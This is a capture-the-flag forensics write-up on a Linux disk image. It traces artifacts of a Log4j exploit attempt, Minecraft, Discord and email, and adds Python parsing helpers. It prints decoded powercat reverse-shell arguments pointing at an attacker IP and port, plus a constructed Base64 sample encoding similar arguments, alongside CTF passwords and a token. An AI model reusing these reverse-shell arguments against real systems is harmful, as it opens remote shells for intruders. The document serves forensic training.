Magnet User Summit 2022 CTF - Linux

Previous: Egg Hunt | iPhone

The last part of the MUS CTF was a Linux image. I will say that I have the least experience with Linux (still) so it was good to give it a go. Let's see how far the rabbit hole goes!

I use print statements for my logging

What is the name of the utility/library the user was looking at exploits for?

I looked through the web history and didn't see anything apparently relevant, so I started scouring the file system and came across a screenshot at the following path:

home\rafael\Pictures\Screenshot from 2022-02-09 17-31-17.png

Figure 1: Screenshot of YouTube

You can see that the screenshot was of a Log4J exploit.

Mischievous Lemur

What is the version ID number of the operating system on the machine? format: XX.XX

In the file system you can find the answer fairly quickly at path:

usr\lib\os-release

You can see that the OS version ID was 21.10.

Figure 2: OS version in os-release

$whoami

What is the hostname of the computer?

Another fairly easy one if you know where to look. We can find the answer at:

etc\hostname

We can see the hostname was "rshell-lenovo".

Figure 3: hostname file info
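The two answers above come from plain text files, so they are easy to pull in bulk from a mounted image root. The following is an added example, not code from the writeup: it parses the os-release KEY=VALUE format (quoted values, comments, blank lines) and reads /etc/hostname from a root directory. The sample file contents are constructed to match the values found above, and the script writes them into a temporary directory laid out like an image root. The forward-slash paths are mine; AXIOM displays the same files with backslashes as in the writeup.

```python
import os
import tempfile

# Constructed sample contents modelled on Ubuntu's os-release and /etc/hostname.
# These are not the CTF image's real files; the values mirror the writeup's answers.
SAMPLE_OS_RELEASE = '''PRETTY_NAME="Ubuntu 21.10"
NAME="Ubuntu"
VERSION_ID="21.10"
VERSION="21.10 (Impish Indri)"
ID=ubuntu
ID_LIKE=debian
# comment lines and blank lines are permitted by the format

HOME_URL="https://www.ubuntu.com/"
'''
SAMPLE_HOSTNAME = "rshell-lenovo\n"


def parse_os_release(text):
    """Parse os-release KEY=VALUE lines into a dict, stripping quotes and comments."""
    values = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        value = value.strip()
        # values may be wrapped in single or double quotes
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
            value = value[1:-1]
        values[key.strip()] = value
    return values


def identify_system(root):
    """Read os-release and hostname from a mounted image root directory."""
    osr = {}
    # systemd checks /etc/os-release first and falls back to /usr/lib/os-release
    for rel in ("etc/os-release", "usr/lib/os-release"):
        path = os.path.join(root, rel)
        if os.path.isfile(path):
            with open(path, encoding="utf-8") as fh:
                osr = parse_os_release(fh.read())
            break
    hostname = None
    hn_path = os.path.join(root, "etc", "hostname")
    if os.path.isfile(hn_path):
        with open(hn_path, encoding="utf-8") as fh:
            hostname = fh.read().strip()
    return {
        "name": osr.get("NAME"),
        "version_id": osr.get("VERSION_ID"),
        "pretty_name": osr.get("PRETTY_NAME"),
        "hostname": hostname,
    }


def build_sample_root():
    """Write the constructed sample files into a temp dir shaped like an image root."""
    root = tempfile.mkdtemp(prefix="musctf_")
    os.makedirs(os.path.join(root, "usr", "lib"))
    os.makedirs(os.path.join(root, "etc"))
    with open(os.path.join(root, "usr", "lib", "os-release"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_OS_RELEASE)
    with open(os.path.join(root, "etc", "hostname"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_HOSTNAME)
    return root


if __name__ == "__main__":
    # point identify_system() at a real mounted root to triage an actual image
    print(identify_system(build_sample_root()))
```

Checking both locations matters because on some images /etc/os-release is a symlink into /usr/lib that may not survive extraction, which is presumably why the writeup found the file under usr\lib.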

A little blue birdie told me

What is one anime that the user likes?

Judging from the hint in the question title I knew Twitter was involved. A quick search for "anime" turned up results in the mailbox file at path:

home\rafael\.thunderbird\vrvcx2qf.default-release\ImapMail\imap.gmail.com\INBOX

In a Twitter email we can see that the user was interested in Attack On Titan.

Figure 4: Twitter email for anime accounts

Into the Matrix we go

What is the UUID for the attacker's Minecraft account?

I knew right away I had to find the Minecraft folder and config details in the file system so it was time to dig. It didn't take long to find the user config at:

home\rafael\.minecraft\usercache.json

The JSON file had the UUID of 8b0dec19-b463-477e-9548-eef20c861492.

Figure 5: Minecraft user details

Be our guest

What was the user's first password for the guest wifi?

This was an odd question, so I did a quick keyword search in AXIOM for "guest" and hit on some emails. Sorting by timestamp, the first email had a password of "93483".

home\rafael\.thunderbird\vrvcx2qf.default-release\ImapMail\imap.gmail.com\INBOX

Figure 6: Guest wifi password in email

Today's YouTube video is sponsored by...

What VPN client did the user install and use on the machine?

I struggled with this one initially: a quick search for VPN found OpenVPN, which appeared to be installed and actually used, but that was incorrect. So I went back to the browser history to see what else had been visited and saw a bunch of entries for Zerotier, including the download link and profile logins. I went with that and it hit.

Figure 7: Zerotier search in AXIOM

We can see it was accessed in bash history too.

Figure 8: Bash history with Zerotier

If a picture is worth a thousand words how many is a video worth?

The user watched a video that premiered on Dec 11th 2021. How many views did it have when they watched it on February 9th?

I looked in web history and didn't see anything, so I went back to the folder where I found the earlier YouTube screenshot, and was successful. The screenshot at the following path shows the video with 265,355 views:

home\rafael\Pictures\Screenshot from 2022-02-09 17-42-23.png

Figure 9: YouTube video premiere

I'm hungry for videos

What is the new channel name for the YouTuber whose cookbook is shown on the device?

Another kind of weird question. I looked at web history again but didn't see anything so I went back to just exploring the file system. I came across another image file at:

home\rafael\marshalsec\poc\gYlgmvjs.jpeg

Figure 10: Binging with Babish book screenshot

The thumbnail shows a book by Babish, and doing a quick search we see his new channel is called "Babish Culinary Universe".

Figure 11: Babish YouTube page

Hunt the Wumpus

What is the module with the highest installed version for the chat application with the mascot Wumpus?

A quick Google search for Wumpus showed that it is the Discord mascot, so I knew to look for any Discord files/folders on the file system. Looking through the file system I came across the file of interest:

home\rafael\.config\discord\0.0.16\modules\installed.json

We can see that the highest installed version was v5 for "discord_voice".

Figure 12: Installed modules for Discord

Never gonna give... up on this question

What is the upload date of the second YouTube video on the channel where the user downloaded a YouTube video from? (Format MM/DD/YYYY)

The question title made this one almost too obvious: we were looking for any hints of Rick Astley's "Never Gonna Give You Up". There was a downloaded file of the music video at:

home\rafael\Downloads\Rick Astley - Never Gonna Give You Up (Official Music Video).wav

If we go to the YouTube channel for Rick, the second video was uploaded on 10/25/2009.

Figure 13: Rick Astley video views

Buzzy Bees

What is the SHA-1 hash of the "latest" release of Minecraft according to the system? 

Another question to hunt through the file system. You can find a version file at the path:

home\rafael\.minecraft\versions\version_manifest_v2.json

We can see the latest release 22w06a had an SHA-1 hash of 3c6e119c0ff307accf31b596f9cd47ffa2ec6305.

Figure 14: Minecraft release SHA-1
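Three of the answers so far (the usercache.json UUID, the highest installed Discord module, and the SHA-1 of the "latest" version) live in small JSON files, and it is worth parsing them rather than reading by eye because the digest and UUID are easy to mistranscribe. The following is an added example, not code from the writeup: it loads constructed samples modelled on those three files, validates the UUID and SHA-1 syntax, and picks the highest installedVersion. The usercache.json and version_manifest_v2.json layouts are the real ones; the installed.json layout (module name mapped to an object with installedVersion) is my assumption, and the sample manifest sets latest.release to 22w06a to mirror the writeup's reading.

```python
import json
import re
import uuid

# Constructed samples modelled on usercache.json, Discord's installed.json and
# version_manifest_v2.json. Not the image's real files; the Discord layout is assumed.
SAMPLE_USERCACHE = json.dumps([
    {"name": "constructed_player", "uuid": "8b0dec19-b463-477e-9548-eef20c861492",
     "expiresOn": "2022-03-11 17:31:17 -0500"},
])
SAMPLE_INSTALLED = json.dumps({
    "discord_desktop_core": {"installedVersion": 1},
    "discord_voice": {"installedVersion": 5},
    "discord_utils": {"installedVersion": 2},
})
SAMPLE_MANIFEST = json.dumps({
    "latest": {"release": "22w06a", "snapshot": "22w06a"},
    "versions": [
        {"id": "22w06a", "type": "snapshot",
         "sha1": "3c6e119c0ff307accf31b596f9cd47ffa2ec6305"},
        {"id": "1.18.1", "type": "release",
         "sha1": "0000000000000000000000000000000000000000"},  # constructed placeholder
    ],
})

SHA1_RE = re.compile(r"^[0-9a-f]{40}$")


def usercache_accounts(text):
    """Return (name, uuid) pairs from usercache.json; uuid is None if malformed."""
    accounts = []
    for entry in json.loads(text):
        try:
            canonical = str(uuid.UUID(entry.get("uuid", "")))  # ValueError if malformed
        except ValueError:
            canonical = None
        accounts.append((entry.get("name"), canonical))
    return accounts


def highest_installed_module(text):
    """Return (module, version) with the largest installedVersion in installed.json."""
    modules = json.loads(text)
    name, info = max(modules.items(), key=lambda kv: kv[1].get("installedVersion", -1))
    return name, info["installedVersion"]


def latest_version_sha1(text, channel="release"):
    """Resolve latest.<channel> in a version manifest and return (id, sha1)."""
    manifest = json.loads(text)
    wanted = manifest["latest"][channel]
    for version in manifest["versions"]:
        if version["id"] == wanted:
            sha1 = version["sha1"].lower()
            if not SHA1_RE.match(sha1):
                raise ValueError("sha1 is not a 40-hex-digit digest: %r" % sha1)
            return wanted, sha1
    raise KeyError("latest.%s = %r not present in versions list" % (channel, wanted))


if __name__ == "__main__":
    print(usercache_accounts(SAMPLE_USERCACHE))
    print(highest_installed_module(SAMPLE_INSTALLED))
    print(latest_version_sha1(SAMPLE_MANIFEST))
```

The sha1 field in a real manifest is the digest of that version's own JSON descriptor, so if you have the descriptor on the image you can hash it and confirm the manifest entry matches.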

It's raining ocelots and wolves

According to Windows, what was the temperature in Fahrenheit on February 11th, 2022 at 6:30 PM? (Format: XXF | Example: 14F)

In the same folder we found the Babish image there was another screenshot. This one was of a Windows computer:

home\rafael\marshalsec\poc\YXvySdGd.jpeg

We can see the date in the bottom right was February 11 and in the bottom left the temperature was 45F.

Figure 15: Windows computer screenshot

The RCE is base(64)d on what?

What were the three flags and their values that were passed to powercat? The answer must be provided in the same format as the command was entered. (For example, if the command was "powercat -D Y -l a -n" the answer would be "-D Y -l a -n")
A keyword search for "powercat" shows some hits in web history but the significant hit is in the bash history file.

home\rafael\.bash_history

Figure 16: Bash history for Rafael
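Both the Zerotier question and this one were settled by reading .bash_history, so a small parser for that file is handy. The following is an added example, not code from the writeup: it splits a history file into commands, attaches the "#<epoch>" timestamp lines that bash writes when HISTTIMEFORMAT is set (commands recorded without one get no time), and runs a case-insensitive keyword search. The history text is constructed for the example and is not the content of Rafael's real file.

```python
import re
from datetime import datetime, timezone

# Constructed sample .bash_history (not the evidence file). "#<epoch>" lines are the
# timestamps bash records with HISTTIMEFORMAT; the "ls" line simulates a session
# that did not record them.
SAMPLE_HISTORY = """\
#1644422400
sudo apt install zerotier-one
#1644422460
sudo zerotier-cli info
ls -la ~/marshalsec/poc
#1644426000
nano ~/marshalsec/poc/Log4jRCE.java
"""

TIMESTAMP_RE = re.compile(r"^#(\d{9,10})$")


def parse_history(text):
    """Return [{'epoch': int|None, 'when': ISO-8601 str|None, 'cmd': str}] in file order."""
    entries = []
    pending = None
    for line in text.splitlines():
        match = TIMESTAMP_RE.match(line)
        if match:
            pending = int(match.group(1))  # applies to the next command line only
            continue
        if not line.strip():
            continue
        when = None
        if pending is not None:
            when = datetime.fromtimestamp(pending, timezone.utc).isoformat()
        entries.append({"epoch": pending, "when": when, "cmd": line})
        pending = None
    return entries


def search_history(entries, keyword):
    """Case-insensitive substring match over the command text, preserving order."""
    needle = keyword.lower()
    return [entry for entry in entries if needle in entry["cmd"].lower()]


if __name__ == "__main__":
    for hit in search_history(parse_history(SAMPLE_HISTORY), "zerotier"):
        print(hit["when"], hit["cmd"])
```

Timestamps are only present when the user's shell had HISTTIMEFORMAT set, so a missing "when" is normal and the file order is still the best ordering evidence you have; also remember bash only flushes history on exit, so the last session before imaging may be incomplete.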

The RCE appears to be the Log4j .java file that is edited later on in the bash history:

home\rafael\marshalsec\poc\Log4jRCE.java

The question title hints at what we're looking for: a string in the file is Base64 encoded.

Figure 17: Log4jRCE.java in NotePad++

We can extract the encoded piece and drop it in CyberChef and decode it from Base64.

Figure 18: Encoded snippet in CyberChef

We see that the answer was "-c 192.168.191.253 -p 4444 -e cmd".
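Dropping the string into CyberChef works for one file, but when triaging a source tree it is faster to scan for Base64-looking tokens and keep only the ones that decode to readable text. The following is an added example, not code from the writeup: the Java snippet is constructed (it is not the Log4jRCE.java from the image) and its encoded string decodes to a made-up argument string using the TEST-NET address 192.0.2.10 rather than the real one; the second literal is a long identifier that looks like Base64 but is rejected because it does not decode to printable text.

```python
import base64
import re
import string

# Constructed Java snippet standing in for the file described above (not the real one).
# "cfg" encodes a constructed argument string; "junk" is not Base64 despite matching
# the alphabet, and must be filtered out.
SAMPLE_JAVA = '''\
public class Sample {
    static String cfg = "LWMgMTkyLjAuMi4xMCAtcCA0NDQ0IC1lIGNtZA==";
    static String junk = "abcdefghijklmnop";
    public static void main(String[] args) {
        System.out.println(new String(java.util.Base64.getDecoder().decode(cfg)));
    }
}
'''

# 16+ characters of the Base64 alphabet with optional padding
CANDIDATE_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
PRINTABLE = set(string.printable)


def decode_if_text(token):
    """Strictly decode one token; return the text if it is printable UTF-8, else None."""
    try:
        raw = base64.b64decode(token, validate=True)  # rejects bad alphabet or padding
        text = raw.decode("utf-8")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None
    if not text or any(ch not in PRINTABLE for ch in text):
        return None
    return text


def find_base64_strings(source):
    """Return (encoded, decoded) pairs for every token that decodes to printable text."""
    hits = []
    for match in CANDIDATE_RE.finditer(source):
        decoded = decode_if_text(match.group(0))
        if decoded is not None:
            hits.append((match.group(0), decoded))
    return hits


if __name__ == "__main__":
    for encoded, decoded in find_base64_strings(SAMPLE_JAVA):
        print(encoded, "->", decoded)
```

The printable-text filter is what keeps the output short on real code; long identifiers, hex digests and random strings almost never survive both strict decoding and the printability check, so what remains is usually worth a look.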

Hello (New) World

How many dimensions (including the overworld) did the player travel to in the oldest of the worlds?

Other than knowing that this involved Minecraft, I wasn't quite sure where to find the answer right away. Digging through the file system I came across some save folders, one of which was (of course) called New World (see question title). We can tell by the folder dates that it was the older of the two.

Figure 19: Minecraft world folders

I figured out that this was the Java version by the folder structure, so I could look up further details on the Minecraft Wiki. I didn't see references to dimensions but did see references to regions. The "region" folder contained 4 .mca files; this folder is the Overworld. We also see folders for DIM-1 and DIM1, which are The Nether and The End respectively.

Figure 20: Minecraft dimensions

I believe the correct answer should be 6.

Matrix_1999 is the key!

What is the mojangClientToken stored in the keystore?

There were multiple ways that you could accomplish this one. You could copy the keyrings to another Linux VM, boot it, and unlock them with the password from the question title:

home\rafael\.local\share\keyrings

The easier way is to convert the E01 to a VM and boot it. Luckily I have the pro version of Arsenal Image Mounter, so it does this automatically for us (a few other commercial tools do too). Once logged in using "Matrix_1999" as the password, you can open Settings > Passwords and Keys and see an entry for mojangClientToken at the bottom. Clicking the key reveals that the token was 2f76c8b04c004ddd888a05a6cad6be52.

Figure 21: mojangClientToken in E01 booted VM